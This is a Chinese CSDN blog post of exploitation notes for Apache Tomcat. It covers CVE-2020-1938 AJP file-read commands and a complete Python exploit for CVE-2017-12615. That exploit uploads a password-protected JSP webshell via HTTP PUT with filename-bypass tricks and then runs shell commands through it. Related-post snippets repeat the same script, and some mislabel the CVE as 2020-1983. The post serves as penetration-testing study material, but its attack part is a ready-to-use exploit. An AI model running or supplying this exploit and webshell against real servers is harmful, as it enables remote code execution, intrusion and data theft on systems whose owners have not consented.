tomcat

最新推荐文章于 2024-01-27 16:37:47 发布
最新推荐文章于 2024-01-27 16:37:47 发布
阅读量199 收藏
点赞数
分类专栏: web学习 文章标签: tomcat java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61142406/article/details/125020604
版权

cve-2020-1938

Apache Tomcat 6

Tomcat 7系列 <7.0.100

Tomcat 8系列 < 8.5.51

Tomcat 9 系列 <9.0.31

读取配置文件

python3 /root/桌面/cve-2020-1983/tomcat.py read_file --webapp=manager /WEB-INF/web.xml 192.168.64.142

https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi/blob/master/CNVD-2020-10487-Tomcat-Ajp-lfi.py

cve-2017-12165

利用条件是Windows+Tomcat 7.0.x+配置文件readonly=false,配置文件内容如:

<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>

python3 /root/桌面/tomcat-cve-2017-12165.py http://192.168.64.142:8080/

http://192.168.64.142:8080/cbd.jsp?pwd=cbd&cmd=ls

# 某佬脚本

import requests
import sys

'''
Usege:python3 CVE-2017-12615.py http://127.0.0.1/
Shell:http://120.79.66.58:8080/写入的文件?pwd=cbd&cmd=whoami
'''


def attack(url):
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0"}
    data = """<%
    if("cbd".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
    %>"""
    code = ['cbd.jsp.', 'cbd.jsp/', 'cbd.jsp::$DATA']
    try:
        for i in range(2):
            requests.put(url + code[i], headers=headers, data=data)  # 发送put请求写入文件
            resp = requests.get(url + code[i][:-1], headers=headers)  # 发送get请求验证是否写入
            if resp.status_code == 200:
                print('写入文件成功,shell地址为 ' + url + code[0][:-1])
                exit()
        requests.put(url + code[2], headers=headers, data=data)
        resp1 = requests.get(url + code[2], headers=headers)
        if resp1.status_code == 200:
            print('写入文件成功,shell地址为 ' + url + code[2])
        print('Exploit结束')
    except:
        "someone is error!!!"


if __name__ == '__main__':
    target_url = sys.argv[1]
    attack(target_url)
I·CE
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12615利用脚本
04-16
CVE-2017-12615利用脚本;tomcat服务器PUT上传导致命令执行。
[CVE-2017-12615]利用脚本
https://www.cnblogs.com/zpchcbd/
05-07 607
# coding:utf-8 # author:cbd666 import requests import sys ''' Usege:python3 CVE-2017-12615.py http://127.0.0.1/ Shell:http://120.79.66.58:8080/写入的文件?pwd=cbd&cmd=whoami ''' def attack(url): ...
[工具]Tomcat CVE-2017-12615 远程代码执行
weixin_30236595的博客
01-12 257
工具:K8_TocmatExp编译:VS2012C#(.NETFrameworkv2.0)组织:K8搞基大队[K8team]作者:K8拉登哥哥博客:http://qqhack8.blog.163.com发布:2017/11/2415:21:25简介:Tomcat CVE-2017-12615 远程代码执行漏洞图片: 功能:下载地址:文件:K8_Tocma...
漏洞复现之CVE-2017-12615
Blood_Pupil的博客
03-16 3121
利用方式 MSDN All files on an NTFS volume consist of at least one stream - the main stream – this is the normal, viewable file in which data is stored. The full name of a stream is of the form below. ...
CVE-2017-12615(远程代码执行漏洞)
Biu_Biu_Bi的博客
04-07 2069
Tomcat 运行在 Windows 操作系统时,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。2、使用burpsuite抓包,修改GET为PUT上传方式,添加文件名1.jsp/,添加shell脚本。1、使用冰蝎v4.05生成jsp脚本。5、打开ip:8080,成功开启。4、测试成功上传Shell。
tomcat 8.5.100
04-10
Apache Tomcat 8.5.100 是一个流行的开源Java Servlet容器,它实现了Java EE Web应用程序规范,尤其是Servlet和JSP。Tomcat是许多Web开发者首选的服务器,因为它轻量级、高效且易于配置。在本文中,我们将深入探讨...
tomcat9.0.2
11-09
【标题】"Tomcat 9.0.2" 是一个重要的Java Web服务器和应用服务器,由Apache软件基金会的Tomcat项目开发。这个版本是Tomcat 9系列的一个早期发行版,主要面向开发者和那些需要运行基于Java Servlet和JavaServer ...
tomcat8.0版本下载
03-28
tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本下载tomcat8.0版本...
apache-tomcat-8.5.100.tar.gz
最新发布
05-29
Apache Tomcat 是一款广泛应用的开源软件,主要用于部署和运行Java Servlet和JavaServer Pages(JSP)应用程序。在本文中,我们将深入探讨Apache Tomcat 8.5.100这一特定版本的重要特性、安装与配置过程,以及如何...
tomcat7.0.109下载
03-30
Apache Tomcat 7.0.109是Tomcat服务器的一个特定版本,它是一个开源软件应用服务器,专门用于运行Java Servlets和JavaServer Pages(JSP)。Tomcat是由Apache Software Foundation开发并维护的,它是Java EE(现在...
CVE-2017-12615-master.zip
09-04
CVE-2017-12615漏洞利用工具;CVE-2017-12615漏洞利用工具;
cve监控脚本
weixin_42346836的博客
10-16 677
[1]通过监控github api进行cve告警推送 [2]消息推送通过钉钉和server酱推送 [3]默认启用server酱推送 [4]所有推送结果都写入到PGsql中,github_URL为唯一索引 # -*- coding:utf-8 -*- import time, re import json import requests from operator import itemgetter import psycopg2 def timeUp(): ticks = time.strft
Tomcat任意写入文件漏洞(CVE-2017-12615)
黑白的博客
11-22 9397
声明 好好学习,天天向上 漏洞描述 2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,漏洞CVE编号:CVE-2017-12615和CVE-2017-12616,其中 远程代码执行漏洞(CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全) 当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能
Tomcat任意文件上传(CVE-2017-12615)漏洞复现(附POC)
byt8563的博客
06-30 3858
欢迎使用Markdown编辑器 • 漏洞名称:Tomcat任意文件上传漏洞 • 漏洞编号:CVE-2017-12615 • 漏洞影响:上传包含任意代码的文件,并被服务器执行。 • 影响平台:Windows • 影响版本:Apache Tomcat 7.0.0 - 7.0.81 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除了标准的Markdown编辑器功能,我们增加了如下几点新功能,帮助你用它写博客: 全新的界面设计 ,将会带来全新的写作体验; 在创作中心设置你喜爱的代码高亮样式,
[CVE-2017-12615]漏洞复现
https://www.cnblogs.com/zpchcbd/
05-07 2506
漏洞编号CVE-2017-12615 漏洞影响的tomcat版本为tomcat7.0.0-7.0.81版本 环境搭建 docker搭建 ubuntu16.04+docker sudo docker-compose up -d 手动搭建 tomcat7.0.0-7.0.81 环境 然后自己去配置当前目录下的/conf/web.xml 添加如下代码: readonly false 利用...
cvemap-CVE漏洞库工具(内含解析脚本)
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
01-27 1823
cvemap一个强大的CVE漏洞库+POC库搜索工具。
CVECVE-2020-1983:Tomcat 文件包含漏洞
边扯边淡
05-31 1018
起序:漏扫完看报告的时候发现的,复现学习一下。 一、靶场环境 使用的是 github 上的 vulhub 环境。Tomcat 版本为 9.0.30。 1、漏洞:任意文件包含 攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件、源代码等。 2、影响版本 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 .
tomcat ajp协议安全限制绕过漏洞_未然公告 | Apache Tomcat AJP CVE20201938漏洞防御指导...
weixin_39589511的博客
12-01 278
Apache Tomcat发布了安全补丁,修补了一个AJP相关的严重漏洞,编号为CVE-2020-1983。Tomcat是目前比较流行的Web应用服务器,其中AJP协议实现存在任意文件读取漏洞。当前公开利用代码已经在互联网发布,存在较高的攻击风险,请涉及的客户及时更新相关补丁或者采取防范措施。漏洞影响攻击者通过该漏洞能够达成以下攻击效果:-读取webapp下任意文件。- 如果服务器端同...
CVE-2017-12615 PUT方法漏洞复现
weixin_56537388的博客
09-07 147
找到[CVE-2017-12615] [http] [high] http://192.168.142.151/poc.jsp?浏览器访问,获得/etc/passwd信息。这里的端口出现占用问题,需要修改端口。使用nuclei工具。
Tomcat源码深度探索
"Tomcat源码研究是一份深入解析Tomcat服务器内部机制的资料,适合对Web开发感兴趣的读者。这份资料涵盖了Tomcat的启动过程、架构设计、JMX的应用以及《How Tomcat Works》一书的读书笔记。作者通过解析Catalina.bat...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值